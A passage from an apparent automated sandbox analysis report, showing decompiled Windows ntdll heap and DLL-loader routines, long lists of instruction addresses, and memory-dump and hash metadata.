					 *((intOrPtr*)(_t421 - 0x60)) =  *_t416;
					 *((intOrPtr*)(_t421 - 0x5c)) =  *((intOrPtr*)(_t416 + 4));
					 *((intOrPtr*)(_t421 - 0x4c)) =  *((intOrPtr*)(_t421 + 0x10));
					goto L11;
				}
			}















































                                                0x0090e6c1
                                                0x0090e6c6
                                                0x0090e6cb
                                                0x0090e6d0
                                                0x0090e6d8
                                                0x0090e6e1
                                                0x0094fb40
                                                0x0094fb5a
                                                0x0094fb5f
                                                0x0094fb5f
                                                0x0090e6e7
                                                0x0090e6f2
                                                0x0094fb67
                                                0x0094fb67
                                                0x0090e6f8
                                                0x0090e6fa
                                                0x0090e6fd
                                                0x0090e700
                                                0x0090e703
                                                0x0090e706
                                                0x0090e70a
                                                0x0090e70f
                                                0x0091c259
                                                0x0091c25e
                                                0x0091c260
                                                0x00000000
                                                0x00000000
                                                0x0091c272
                                                0x0091c274
                                                0x0091c276
                                                0x00000000
                                                0x00000000
                                                0x0091c28c
                                                0x0091c28e
                                                0x0091c290
                                                0x0094fb71
                                                0x00000000
                                                0x0094fb71
                                                0x0091c296
                                                0x00000000
                                                0x0090e715
                                                0x0090e715
                                                0x0090e718
                                                0x0090e71e
                                                0x0090e722
                                                0x0090e726
                                                0x0090e72d
                                                0x0090e739
                                                0x00000000
                                                0x0090e735
                                                0x0090e736
                                                0x00000000
                                                0x0090e736
                                                0x0090e72d
                                                0x0090e73d
                                                0x0090e741
                                                0x0090ec24
                                                0x0090ec29
                                                0x0090ec2b
                                                0x0090e77f
                                                0x0090e782
                                                0x0090e785
                                                0x0090e785
                                                0x0090e787
                                                0x0090e787
                                                0x0090e78c
                                                0x0090e78f
                                                0x0090e795
                                                0x0094fe2e
                                                0x0094fe33
                                                0x0090e79b
                                                0x0090e7a0
                                                0x0090e7a6
                                                0x0094fe3b
                                                0x0094fe3b
                                                0x0090e7b3
                                                0x0090e7b3
                                                0x0090ec47
                                                0x0090ec49
                                                0x0090ec4b
                                                0x00912a55
                                                0x00912a5b
                                                0x0094fbc5
                                                0x00000000
                                                0x0094fbc5
                                                0x00000000
                                                0x00912a61
                                                0x0090ec51
                                                0x0090ec5c
                                                0x0090ec61
                                                0x0090ec66
                                                0x0090ec82
                                                0x0090ec84
                                                0x0090ec86
                                                0x0090ec88
                                                0x0090ed2e
                                                0x0090ed31
                                                0x0090ed36
                                                0x0090ed39
                                                0x0090ed4c
                                                0x0090ed57
                                                0x00000000
                                                0x0090ed57
                                                0x0090ed3b
                                                0x0090ed3e
                                                0x0090ed43
                                                0x0090ed47
                                                0x00000000
                                                0x0090ed47
                                                0x0090ec8e
                                                0x0090ec94
                                                0x0090ec95
                                                0x0090ec96
                                                0x0090ec99
                                                0x0090ec9c
                                                0x0090eca2
                                                0x0090eca4
                                                0x0090eca6
                                                0x0090ed24
                                                0x0090ed24
                                                0x0090ed29
                                                0x00000000
                                                0x0090ed29
                                                0x0090eca8
                                                0x0090ecab
                                                0x0091163f
                                                0x00911644
                                                0x00911646
                                                0x00000000
                                                0x00000000
                                                0x0091164f
                                                0x00911651
                                                0x00000000
                                                0x00911651
                                                0x0090ecb1
                                                0x0090ecb1
                                                0x0090ecbb
                                                0x0094fc49
                                                0x0094fc4e
                                                0x0094fc51
                                                0x0094fc55
                                                0x00000000
                                                0x00000000
                                                0x0094fc5b
                                                0x0094fc62
                                                0x00000000
                                                0x00000000
                                                0x0094fc68
                                                0x0094fc69
                                                0x0094fc71
                                                0x0094fc72
                                                0x0094fc77
                                                0x0094fc7c
                                                0x0094fc83
                                                0x00000000
                                                0x00000000
                                                0x0094fc89
                                                0x0094fc9b
                                                0x0094fc9d
                                                0x0094fca0
                                                0x0094a0de
                                                0x0094a0e0
                                                0x00000000
                                                0x0094a0e6
                                                0x00000000
                                                0x0094a0e6
                                                0x0094a0e0
                                                0x0090ecc1
                                                0x0090ecd4
                                                0x0090ecd6
                                                0x0090ecd9
                                                0x0090ecdb
                                                0x00928599
                                                0x0092859d
                                                0x00000000
                                                0x00000000
                                                0x0094fce0
                                                0x0094fce5
                                                0x0094fce7
                                                0x0094fce9
                                                0x00000000
                                                0x0094fcef
                                                0x0094fcef
                                                0x0094fcf6
                                                0x00000000
                                                0x0094fcf6
                                                0x009285a8
                                                0x009285a8
                                                0x009285ab
                                                0x009285af
                                                0x0091027b
                                                0x0091027b
                                                0x00910281
                                                0x00910289
                                                0x0091028e
                                                0x00910291
                                                0x00911dbe
                                                0x00911dc7
                                                0x00911dc7
                                                0x0091029a
                                                0x0091029f
                                                0x00000000
                                                0x0091029f
                                                0x009285c1
                                                0x009285c3
                                                0x009285c5
                                                0x0094fdf6
                                                0x0094fdfb
                                                0x0094fdfb
                                                0x0094fdfd
                                                0x0094fdfd
                                                0x0094fe04
                                                0x0094fe0d
                                                0x0094fe0d
                                                0x00000000
                                                0x0094fe04
                                                0x009285cb
                                                0x00000000
                                                0x009285cb
                                                0x0090ece1
                                                0x0090ece6
                                                0x0090ece9
                                                0x0094fd7f
                                                0x0094fd86
                                                0x0094fdc2
                                                0x0094fdc2
                                                0x00910107
                                                0x00910107
                                                0x0091010c
                                                0x00910110
                                                0x00910123
                                                0x00910123
                                                0x0091013b
                                                0x0091013d
                                                0x0091013f
                                                0x0094fdca
                                                0x00000000
                                                0x00910145
                                                0x00910148
                                                0x0091014b
                                                0x0091014f
                                                0x0094a0eb
                                                0x00910155
                                                0x00910155
                                                0x00910158
                                                0x0091015b
                                                0x00914ebc
                                                0x00910161
                                                0x00910164
                                                0x00910164
                                                0x00910164
                                                0x00910167
                                                0x00910167
                                                0x00910170
                                                0x00910176
                                                0x0091017c
                                                0x0091017f
                                                0x0091017f
                                                0x00910185
                                                0x0091018a
                                                0x00910190
                                                0x00910195
                                                0x00910199
                                                0x009101a3
                                                0x009101a6
                                                0x009101a8
                                                0x009101ab
                                                0x009101ae
                                                0x009101ae
                                                0x009101b1
                                                0x009101b4
                                                0x009101b6
                                                0x009101b6
                                                0x009101b9
                                                0x009101bc
                                                0x009101be
                                                0x009101be
                                                0x009101c1
                                                0x009101c4
                                                0x009101c6
                                                0x009101cf
                                                0x009101d2
                                                0x009101d7
                                                0x009101dd
                                                0x009101e3
                                                0x009101e3
                                                0x009101e5
                                                0x00000000
                                                0x00000000
                                                0x0094fdd1
                                                0x0094fdd8
                                                0x0094fddf
                                                0x0094fde6
                                                0x0094fde6
                                                0x009101eb
                                                0x009101ee
                                                0x009101f1
                                                0x009101f2
                                                0x009101f7
                                                0x009101f8
                                                0x009101fd
                                                0x00910202
                                                0x00910205
                                                0x00910207
                                                0x00910209
                                                0x00910209
                                                0x00910209
                                                0x00910209
                                                0x0091020c
                                                0x0091020c
                                                0x00910218
                                                0x0091021f
                                                0x00910222
                                                0x00910224
                                                0x00910227
                                                0x00910229
                                                0x0091022c
                                                0x00910231
                                                0x00910237
                                                0x0091023a
                                                0x0091023c
                                                0x00910242
                                                0x00910242
                                                0x00910245
                                                0x0091024b
                                                0x00910251
                                                0x00910254
                                                0x00910256
                                                0x00910266
                                                0x0091026c
                                                0x00910271
                                                0x00910275
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00910275
                                                0x0091013f
                                                0x00910112
                                                0x00910116
                                                0x0091011d
                                                0x0094a0bf
                                                0x0094a0cf
                                                0x0094a0d1
                                                0x0094a0d3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094a0d9
                                                0x00000000
                                                0x0091011d
                                                0x0094fd88
                                                0x0094fd8c
                                                0x00000000
                                                0x00000000
                                                0x0094fd8e
                                                0x0094fd93
                                                0x0094fd96
                                                0x0094fd9a
                                                0x0094fdae
                                                0x0094fdae
                                                0x0094fdb2
                                                0x00000000
                                                0x00000000
                                                0x0094fdb8
                                                0x00000000
                                                0x0094fdb8
                                                0x0094fd9c
                                                0x0094fd9e
                                                0x00000000
                                                0x00000000
                                                0x0094fda4
                                                0x0094fda8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094fda8
                                                0x0090ecf2
                                                0x0090ecf3
                                                0x0090ecf4
                                                0x0090ecfe
                                                0x0090ed01
                                                0x0090ed03
                                                0x0090ed08
                                                0x0090ed0b
                                                0x0090ed10
                                                0x0094fd3c
                                                0x0094fd42
                                                0x0094fd43
                                                0x0094fd48
                                                0x0094fd49
                                                0x0094fd4b
                                                0x0094fd53
                                                0x0094fd55
                                                0x0094fd57
                                                0x00000000
                                                0x00000000
                                                0x0094fd5d
                                                0x0094fd61
                                                0x00000000
                                                0x00000000
                                                0x0094fd67
                                                0x0094fd6e
                                                0x0094fd74
                                                0x0094fd74
                                                0x0090ed1f
                                                0x0090ed1f
                                                0x00000000
                                                0x0090ed1f
                                                0x0090ed16
                                                0x0090ed19
                                                0x0094fcfe
                                                0x0094fd03
                                                0x0094fd0b
                                                0x0094fd13
                                                0x0094fd1c
                                                0x0094fd24
                                                0x0094fd2d
                                                0x0094fd32
                                                0x0090e758
                                                0x0090e760
                                                0x0090e762
                                                0x0090e765
                                                0x00911d5d
                                                0x00911d79
                                                0x00911d7b
                                                0x00911d7d
                                                0x00927c97
                                                0x00927c99
                                                0x00927c9f
                                                0x00927ca1
                                                0x0094fbcc
                                                0x00927ca7
                                                0x00927caa
                                                0x00927cb5
                                                0x00927cb5
                                                0x00927ca1
                                                0x00000000
                                                0x00927c99
                                                0x00911d83
                                                0x00911d87
                                                0x0094fb7b
                                                0x0094fb7b
                                                0x0094fb85
                                                0x0094fb87
                                                0x0094fb8f
                                                0x0094fb90
                                                0x0094fb97
                                                0x0094fb97
                                                0x00911cbd
                                                0x00911cc3
                                                0x00911cc6
                                                0x00911cc9
                                                0x00911ccc
                                                0x00911cce
                                                0x00911cd6
                                                0x00911cdd
                                                0x00911cde
                                                0x00911cec
                                                0x00911cee
                                                0x00911cf0
                                                0x0094fba7
                                                0x0094fbad
                                                0x0094fbbb
                                                0x0094fbbb
                                                0x00000000
                                                0x0094fbbb
                                                0x0094fbaf
                                                0x0094fbb5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00911cf6
                                                0x00911cf6
                                                0x00911cf9
                                                0x00911cfe
                                                0x00911d00
                                                0x00911d01
                                                0x00911d02
                                                0x00911d0d
                                                0x00911d0f
                                                0x00911d11
                                                0x0094fbd6
                                                0x0094fbdc
                                                0x0094fbe2
                                                0x0094fbe8
                                                0x0094fbee
                                                0x0094fbf4
                                                0x0094fbfd
                                                0x0094fc03
                                                0x0094fc04
                                                0x0094fc09
                                                0x0094fc0a
                                                0x0094fc0c
                                                0x0094fc13
                                                0x0094fc18
                                                0x0094fc1a
                                                0x0094fc20
                                                0x0094fc27
                                                0x0094fc2d
                                                0x0094fc2d
                                                0x0094fc27
                                                0x0094fc1a
                                                0x0094fbf4
                                                0x0094fbe8
                                                0x00000000
                                                0x0094fbdc
                                                0x00911d17
                                                0x00911d1e
                                                0x00000000
                                                0x00000000
                                                0x00911d30
                                                0x00911d32
                                                0x00911d34
                                                0x00000000
                                                0x00000000
                                                0x0094fc38
                                                0x0094fc3e
                                                0x00000000
                                                0x0094fc44
                                                0x00923566
                                                0x00000000
                                                0x00923566
                                                0x00000000
                                                0x0094fc3e
                                                0x00911cf0
                                                0x00911d8d
                                                0x00911d90
                                                0x00000000
                                                0x00000000
                                                0x00911da1
                                                0x00911da6
                                                0x00911da8
                                                0x00000000
                                                0x00000000
                                                0x00911db1
                                                0x00911db4
                                                0x00000000
                                                0x00911db4
                                                0x0090e772
                                                0x0090e777
                                                0x0090e779
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090e779
                                                0x00000000
                                                0x0090ed19
                                                0x0090e747
                                                0x0090e749
                                                0x0090e74f
                                                0x0090e755
                                                0x00000000
                                                0x0090e755

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: %O$(%O$DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$Status: 0x%08lx$d:\w7rtm\minkernel\ntdll\ldrfind.c
                                                • API String ID: 0-2364370391
                                                • Opcode ID: 4532ad447a1f0d88900fc9d984feddf10a26b851e7d2d93d2186b15a48721092
                                                • Instruction ID: ff8fadc0a55abd0a9f2ce76000c44b77bfbab5e0c5891382323ad7324f71a1a3
                                                • Opcode Fuzzy Hash: 4532ad447a1f0d88900fc9d984feddf10a26b851e7d2d93d2186b15a48721092
                                                • Instruction Fuzzy Hash: 30329B7190024CAFDB21DFA8C884FEEBBB9FF44300F14482AFA55A72A1D7759981DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0091EE4C, Relevance: 8.1, Strings: 6, Instructions: 601COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 61%
                                                			E0091EE4C(void* __ebx, void* __edi, signed int _a4, unsigned int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				void* __esi;
				void* __ebp;
				signed int _t258;
				signed char _t259;
				signed int _t261;
				signed int _t271;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed char _t279;
				intOrPtr _t281;
				signed int _t293;
				intOrPtr _t300;
				intOrPtr _t301;
				unsigned int _t307;
				signed char _t308;
				signed int _t317;
				unsigned int _t326;
				signed int _t327;
				intOrPtr _t335;
				intOrPtr _t347;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed char _t363;
				signed int _t370;
				unsigned int _t380;
				signed int _t381;
				intOrPtr _t389;
				signed int _t401;
				intOrPtr _t403;
				void* _t410;
				signed int _t420;
				signed int _t421;
				unsigned int* _t426;
				signed int _t432;
				signed int _t442;
				intOrPtr _t444;
				signed int _t452;
				signed int _t456;
				intOrPtr _t457;
				void* _t472;
				signed int _t480;
				void* _t483;
				signed int _t484;
				intOrPtr _t486;
				signed short* _t487;
				signed short* _t488;
				unsigned int _t492;
				signed int _t493;

				_t493 = _a4;
				_v12 = 0;
				if(( *(_t493 + 0xd0) ^  *(_t493 + 0x58)) != 0) {
					return E00907353(_t493, _a8, _a12);
				}
				if(_a16 != 0) {
					_t420 = _a8;
					__eflags =  *(_t420 + 2) & 0x00000008;
					if(( *(_t420 + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(_t493 + 0x120)) =  *((intOrPtr*)(_t493 + 0x120)) - 1;
						_t258 = E009261B3(_t420,  &_v36,  &_v24);
						__eflags = _t258;
						if(_t258 != 0) {
							 *((intOrPtr*)(_t493 + 0x124)) =  *((intOrPtr*)(_t493 + 0x124)) - _v24;
						}
					}
					_a4 = _t420;
					L13:
					_t259 =  *((intOrPtr*)(_t420 + 6));
					__eflags = _t259;
					if(_t259 == 0) {
						_t421 = _t493;
						_v20 = _t493;
					} else {
						_t421 = (_t420 & 0xffff0000) - ((_t259 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t421;
						_v20 = _t421;
					}
					_t261 = _a4 + _a12 * 8;
					__eflags =  *((char*)(_t261 + 7)) - 3;
					_v24 = _t261;
					if( *((char*)(_t261 + 7)) == 3) {
						_t483 = _t261 + 8;
						E0090AB77(_t493, _t483);
						_v28 =  *((intOrPtr*)(_t483 + 0x10));
						 *((intOrPtr*)(_t421 + 0x30)) =  *((intOrPtr*)(_t421 + 0x30)) - 1;
						_v16 =  *(_t483 + 0x14);
						 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) - ( *(_t483 + 0x14) >> 0xc);
						 *(_t493 + 0xe0) =  *(_t493 + 0xe0) +  *(_t483 + 0x14);
						 *((intOrPtr*)(_t493 + 0xf0)) =  *((intOrPtr*)(_t493 + 0xf0)) - 1;
						__eflags =  *(_t483 + 0x14) - 0x7f000;
						if( *(_t483 + 0x14) >= 0x7f000) {
							_t102 = _t493 + 0xe4;
							 *_t102 =  *(_t493 + 0xe4) -  *(_t483 + 0x14);
							__eflags =  *_t102;
						}
						_a12 = _a12 + ( *(_t483 + 0x14) >> 3) + 0x20;
						_v12 = 1;
					} else {
						_t32 =  &_v16;
						 *_t32 = _v16 & 0x00000000;
						__eflags =  *_t32;
					}
					_t271 = _a4;
					__eflags =  *(_t271 + 4) ^  *(_t493 + 0x54);
					if(( *(_t271 + 4) ^  *(_t493 + 0x54)) == 0) {
						_t471 = _a4;
						_v8 = _a4;
						_t274 = E00948C11(_t421, _a4);
						__eflags = _a16;
						_t484 = _t274;
						if(_a16 != 0) {
							__eflags = _t484;
							if(_t484 != 0) {
								goto L56;
							}
							goto L18;
						}
						L56:
						__eflags =  *0x9d77b0 - 1;
						if( *0x9d77b0 >= 1) {
							__eflags = _t484;
							if(_t484 == 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *((intOrPtr*)(_t347 + 0xc)) - _t484;
								if( *((intOrPtr*)(_t347 + 0xc)) == _t484) {
									_push("HEAP: ");
									E0094373B();
								} else {
									E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0094373B();
								E0099F826(_t421, _t471, _t484, _t493, 1);
							}
						}
						__eflags = _v12;
						_t275 = _a12;
						_t432 = _a4;
						if(_v12 != 0) {
							_t276 = _t432 + _t275 * 8;
						} else {
							_t130 = _t275 * 8; // -16
							_t276 = _t432 + _t130 - 0x10;
						}
						_t278 = (_t276 & 0xfffff000) - _v8;
						__eflags = _t278;
						_a8 = _t278;
						if(__eflags == 0) {
							L85:
							__eflags =  *0x9d77b0 - 1;
							if( *0x9d77b0 >= 1) {
								__eflags = _v12;
								if(_v12 != 0) {
									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t281 + 0xc);
									if( *(_t281 + 0xc) == 0) {
										_push("HEAP: ");
										E0094373B();
									} else {
										E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push("(!TrailingUCR)");
									E0094373B();
									E0099F826(_t421, _t471, _t484, _t493, 1);
								}
							}
							goto L54;
						} else {
							_t293 = E00904167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
							__eflags = _t293;
							if(_t293 < 0) {
								L89:
								_t472 = 3;
								E0090444F(_t493, _t472);
								__eflags = _v12;
								if(_v12 != 0) {
									E0090A96B(_t493, _t421, _v28 + 0xffffffe8, _v16, _a4,  &_a12);
								}
								L54:
								_push(_a12);
								_push(_a4);
								L12:
								_push(_t493);
								_t279 = E00907353();
								L7:
								return _t279;
							}
							__eflags =  *0x7ffe0380;
							if( *0x7ffe0380 != 0) {
								_t300 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t300 + 0x240) & 0x00000001;
								if(( *(_t300 + 0x240) & 0x00000001) != 0) {
									E0099EFE0(_t493, _v8, _a8, 5);
								}
							}
							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
							_t301 =  *((intOrPtr*)(_t484 + 0x14));
							__eflags = _t301 - 0x7f000;
							if(_t301 >= 0x7f000) {
								_t139 = _t493 + 0xe4;
								 *_t139 =  *(_t493 + 0xe4) - _t301;
								__eflags =  *_t139;
							}
							E0090AB77(_t493, _t484);
							 *((intOrPtr*)(_t484 + 0x14)) =  *((intOrPtr*)(_t484 + 0x14)) + _a8;
							E0090AA2C(_t493, _t484);
							 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) + (_a8 >> 0xc);
							_t307 = _a8;
							 *(_t493 + 0xe0) =  *(_t493 + 0xe0) - _t307;
							_t486 =  *((intOrPtr*)(_t484 + 0x14));
							__eflags = _t486 - 0x7f000;
							if(_t486 >= 0x7f000) {
								_t151 = _t493 + 0xe4;
								 *_t151 =  *(_t493 + 0xe4) + _t486;
								__eflags =  *_t151;
							}
							__eflags = _v12;
							if(_v12 != 0) {
								L73:
								_t308 =  *0x7ffe0380;
								__eflags = _t308;
								if(_t308 != 0) {
									__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E0099F48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, _v12, _v16, _t308 & 0x000000ff);
									}
								}
								_t279 =  *0x7ffe038a;
								__eflags = _t279;
								if(__eflags != 0) {
									_push(_t279 & 0x000000ff);
									_push(_v16);
									_push(_v12);
									L118:
									_push( *(_t493 + 0x78) << 3);
									_push(_a8);
									_push(_v8);
									_push(_t493);
									_t279 = E0099F48C(__eflags);
								}
								goto L7;
							} else {
								_t487 = _t307 + _v8;
								_t442 = _a4;
								_t487[2] =  *(_t493 + 0x54);
								_t317 = _a12;
								_t476 = _a8 + _v8;
								__eflags = _t442 + _t317 * 8 - _a8 + _v8;
								if(_t442 + _t317 * 8 == _a8 + _v8) {
									__eflags =  *(_t493 + 0x4c);
									if( *(_t493 + 0x4c) != 0) {
										_t487[1] = _t487[1] ^ _t487[0] ^  *_t487;
										 *_t487 =  *_t487 ^  *(_t493 + 0x50);
									}
									goto L73;
								}
								_t487[3] = 0;
								_t487[1] = 0;
								_t326 = (_a12 << 3) - _a8 >> 3;
								 *_t487 = _t326;
								__eflags =  *0x9d77b0 - 1;
								if( *0x9d77b0 >= 1) {
									__eflags = _t326 - 1;
									if(_t326 <= 1) {
										_t335 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *(_t335 + 0xc);
										if( *(_t335 + 0xc) == 0) {
											_push("HEAP: ");
											E0094373B();
										} else {
											E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push("((LONG)FreeEntry->Size > 1)");
										E0094373B();
										E0099F826(_t421, _t476, _t487, _t493, 1);
									}
								}
								_t487[1] = 0;
								_t444 =  *((intOrPtr*)(_t421 + 0x18));
								__eflags = _t444 - _t421;
								if(_t444 == _t421) {
									_t327 = 0;
								} else {
									_t327 = (_t487 - _t421 >> 0x10) + 1;
									_a16 = _t327;
									__eflags = _t327;
									if(__eflags <= 0) {
										L99:
										_push(0);
										_push(0);
										_push(_t421);
										_push(_t487);
										_push(_t444);
										_push(3);
										E0099F840(_t421, _t444, _t476, _t487, _t493, __eflags);
										_t327 = _a16;
										L72:
										_t487[3] = _t327;
										E00907353(_t493, _t487,  *_t487 & 0x0000ffff);
										goto L73;
									}
									__eflags = _t327 - 0xfe;
									if(__eflags >= 0) {
										goto L99;
									}
								}
								goto L72;
							}
						}
					}
					L18:
					_t357 = _a4;
					_t38 = _t357 + 0x101f; // 0x101f
					_t484 = 0xfffff000;
					_t452 = _t38 & 0xfffff000;
					_t39 = _t357 + 0x28; // 0x28
					_v8 = _t452;
					__eflags = _t452 - _t39;
					if(_t452 == _t39) {
						_t452 = _t452 + 0x1000;
						_v8 = _t452;
					}
					__eflags = _v12;
					_t471 = _a12;
					if(_v12 != 0) {
						_t358 = _t357 + _t471 * 8;
					} else {
						_t358 = _t357 + _t471 * 8 - 0x10;
					}
					_t359 = _t358 & _t484;
					_a8 = _t359;
					__eflags = _t359 - _t452;
					if(_t359 < _t452) {
						goto L85;
					} else {
						_t360 = _t359 - _t452;
						__eflags = _a16;
						_a8 = _t360;
						if(_a16 != 0) {
							L26:
							__eflags = _t360;
							if(__eflags == 0) {
								L30:
								__eflags = _v12;
								if(_v12 != 0) {
									L38:
									E0090A96B(_t493, _t421, _t452 + 0xffffffe8, _t360, _a4,  &_v32);
									E00907353(_t493, _a4, _v32);
									_t363 =  *0x7ffe0380;
									__eflags = _t363;
									if(_t363 != 0) {
										__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
										if(__eflags != 0) {
											E0099F48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, 0, 0, _t363 & 0x000000ff);
										}
									}
									_t279 =  *0x7ffe038a;
									__eflags = _t279;
									if(__eflags == 0) {
										goto L7;
									} else {
										_push(_t279 & 0x000000ff);
										_push(0);
										_push(0);
										goto L118;
									}
								}
								_t488 = _t360 + _t452;
								_t456 = _a4;
								_t488[2] =  *(_t493 + 0x54);
								_t370 = _a12;
								_t479 = _t456 + _t370 * 8;
								_t360 = _a8;
								_t452 = _v8;
								_t423 = _t360 + _t452;
								__eflags = _t456 + _t370 * 8 - _t360 + _t452;
								if(_t456 + _t370 * 8 == _t360 + _t452) {
									__eflags =  *(_t493 + 0x4c);
									_t421 = _v20;
									if( *(_t493 + 0x4c) != 0) {
										_t488[1] = _t488[1] ^ _t488[0] ^  *_t488;
										 *_t488 =  *_t488 ^  *(_t493 + 0x50);
										L37:
										_t360 = _a8;
										_t452 = _v8;
										goto L38;
									}
									goto L38;
								}
								_t488[3] = 0;
								_t488[1] = 0;
								_t380 = (_a12 << 3) - _a8 - _v8 + _a4 >> 3;
								 *_t488 = _t380;
								__eflags =  *0x9d77b0 - 1;
								if( *0x9d77b0 >= 1) {
									__eflags = _t380 - 1;
									if(_t380 <= 1) {
										_t389 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *(_t389 + 0xc);
										if( *(_t389 + 0xc) == 0) {
											_push("HEAP: ");
											E0094373B();
										} else {
											E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push("(LONG)FreeEntry->Size > 1");
										E0094373B();
										E0099F826(_t423, _t479, _t488, _t493, 1);
									}
								}
								_t421 = _v20;
								_t488[1] = 0;
								_t457 =  *((intOrPtr*)(_t421 + 0x18));
								__eflags = _t457 - _t421;
								if(_t457 == _t421) {
									_t381 = 0;
								} else {
									_t381 = (_t488 - _t421 >> 0x10) + 1;
									_a16 = _t381;
									__eflags = _t381;
									if(__eflags <= 0) {
										L113:
										_push(0);
										_push(0);
										_push(_t421);
										_push(_t488);
										_push(_t457);
										_push(3);
										E0099F840(_t421, _t457, _t479, _t488, _t493, __eflags);
										_t381 = _a16;
										L36:
										_t488[3] = _t381;
										E00907353(_t493, _t488,  *_t488 & 0x0000ffff);
										goto L37;
									}
									__eflags = _t381 - 0xfe;
									if(__eflags >= 0) {
										goto L113;
									}
								}
								goto L36;
							}
							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
							_t401 = E00904167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
							__eflags = _t401;
							if(_t401 < 0) {
								goto L89;
							}
							__eflags =  *0x7ffe0380;
							if( *0x7ffe0380 != 0) {
								_t403 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t403 + 0x240) & 0x00000001;
								if(( *(_t403 + 0x240) & 0x00000001) != 0) {
									E0099EFE0(_t493, _v8, _a8, 6);
								}
							}
							_t360 = _a8;
							_t452 = _v8;
							goto L30;
						}
						_t471 = _v24;
						__eflags =  *((char*)(_t471 + 7)) - 3;
						if( *((char*)(_t471 + 7)) == 3) {
							goto L26;
						}
						__eflags = _t360;
						if(_t360 == 0) {
							goto L54;
						}
						__eflags = _t360 -  *((intOrPtr*)(_t493 + 0x70));
						if(_t360 <  *((intOrPtr*)(_t493 + 0x70))) {
							goto L54;
						}
						goto L26;
					}
				}
				_t480 = _a12;
				if(_t480 <  *((intOrPtr*)(_t493 + 0x70))) {
					L11:
					_push(_t480);
					_push(_a8);
					goto L12;
				}
				_t410 =  *(_t493 + 0x78) + _t480;
				if(_t410 <  *((intOrPtr*)(_t493 + 0x74)) || _t410 <  *(_t493 + 0xe0) >>  *((intOrPtr*)(_t493 + 0x130)) + 3) {
					goto L11;
				} else {
					_t420 = _a8;
					_a4 = E009029B2(_t493, _t420,  &_a12, 0);
					_t413 = _a12;
					if(_a12 - 0x201 > 0xfbff) {
						goto L13;
					} else {
						E00907353(_t493, _a4, _t413);
						_t492 =  *(_t493 + 0xe0) - ( *(_t493 + 0x78) << 3);
						_t279 =  *(_t493 + 0x128) - ( *(_t493 + 0x128) >> 3);
						if(_t492 < _t279) {
							_t426 = _t493 + 0x12c;
							_t279 =  *_t426 - ( *_t426 >> 3);
							__eflags = _t492 - _t279;
							if(_t492 > _t279) {
								_t279 = E00926372(_t493);
								 *_t426 = _t492;
								 *(_t493 + 0x128) = _t492;
							}
						}
						goto L7;
					}
				}
			}































































                                                0x0091ee55
                                                0x0091ee61
                                                0x0091ee65
                                                0x00000000
                                                0x00959a54
                                                0x0091ee71
                                                0x009446f2
                                                0x009446f5
                                                0x009446f9
                                                0x00959a5e
                                                0x00959a70
                                                0x00959a75
                                                0x00959a77
                                                0x00959a80
